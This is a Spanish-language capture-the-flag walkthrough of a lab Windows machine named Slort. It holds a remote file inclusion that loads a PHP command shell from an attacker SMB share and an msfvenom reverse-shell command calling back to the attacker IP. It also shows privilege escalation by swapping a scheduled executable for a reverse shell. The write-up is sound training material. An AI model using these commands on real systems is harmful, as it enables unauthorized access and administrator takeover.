MAQUINA SLORT (Enum de directorios Acceso a la maquina con LFI and RCI PrivEsc Auto Elevated Executable Hijacking)

Enumere los puertos abiertos de la maquina, así mismo el comando va a enumerar los servicios y versiones de cada puerto.

nmap --open -A -sCV --min-rate 3000 slort -oN fullscan.txt

El informe de nmap me mostro datos interesantes, uno de ellos es que me enfrento a una maquina windows.

Con la herramienta nxc sin proporcionarles credenciales y aprovechando el servicio smb 445 voy a verificar ante que windows me enfrento.

Otro dato interesantes que observe fue que tengo 2 servidores web corriendo tanto el puerto 4443 como en el 8080.

Al ingresar al servidor web del puerto 4443 note que me redirigió a un directorio llamado "dashboard" donde tengo un XAMPP corriendo en dicha web.

En uno de las opciones hay un phpinfo donde ingrese y luego de una lectura encontré un usuario llamado RUPERT.

Luego pase a la búsqueda de directorios ocultos, en este caso hice fuerza bruta a la url quitando el directorio donde me redirigió al principio.

Ejecute feroxbuster y encontró varios directorios, el mas interesante el "/site"

Aquí realice un reconocimiento en toda la web, donde me llamo la atención la URL cada vez que selecciono otro apartado.

Te explico, acá estoy en la sección o apartado con nombre "portfolio"

http://slort:8080/site/index.php?page=portfolio.php

.. si selecciono la opción de "service" me va a cambiar obteniendo esta URL.

http://slort:8080/site/index.php?page=service.php

Acá el parámetro "page" esta llamando a los archivos tanto como porfolio, service, etc..

Me resulto interesante, por ende busque si existe hacer un LOCAL FILE INCLUSION en windows ya que esta vulnerabilidad se encuentran normalmente en entornos linux.

En esta web encontré información muy exquisita sobre los LFI en windows.

https://dalthon.medium.com/lfi-rfi-para-servidores-windows-16665081aa3

Según el post se puede realizar un LFI como un RFI.

Lo primero que realice fue crear un archivo básico : ""; cmd = ( _REQUEST["cmd"]); system( cmd); echo ""; die; }?>"

, luego use impacket-smbserver para compartir el archivo php y alojarlo en la maquina. La url quedaría de la siguiente forma:

http://slort:8080/site/index.php?page=\\192.168.45.174\smb\p.php

#smb es la carpeta compartida y p.php el payload.

Ahora cree una revershell.exe con msfvenom.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.174 LPORT=445 -f exe -o r

Seguidamente a través del smbserver aloje la revershell.exe colocando lo siguiente:

\\192.168.45.174\smb\reverse.exe

Quedando la URL de esta manera:

http://slort:8080/site/index.php?page=\\192.168.45.174\smb\p.php&\\192.168.45.174\smb\reverse.exe

En otra terminal me pongo a la escucha con netcat en el puerto de la revershell. En el mismo instante envié la petición y obtuve la conexión con netcat.

Ya con acceso a la maquina hice un reconocimiento de ella para encontrar la forma de escalar privilegios.

En la carpeta Backup encontré unos archivos de texto y un ejecutable que al leer cada archivo el mas interesante es el info.txt donde me indica que cada 5 min se ejecuta el archivo .exe.

Probé si podía cambiar el nombre del ejecutable lo cual funciono, por ende acá puedo abusar o aprovechar de este ejecutable y suplantarlo con una revershell para obtener acceso como administrador en el caso de que lo ejecute el administrador.

Con el comando move moví el archivo y le coloque nombre TFTP.EXE.OLD

Aquí creo la revershell con nombre TFTP.EXE y la subo a la maquina a través de un servidor con python.

Luego espero un tiempito y obtuve acceso como usuario administrador.

PreviousMAQUINA FUNBOXEASY (Enum directory - RCE .php - Pivoting User - PrivEsc SUDO-L)NextMAQUINA PASSPORT (Enum Directorios ss2john id rsa PrivEsc Creacion de archivo con permisos SUID)

Last updated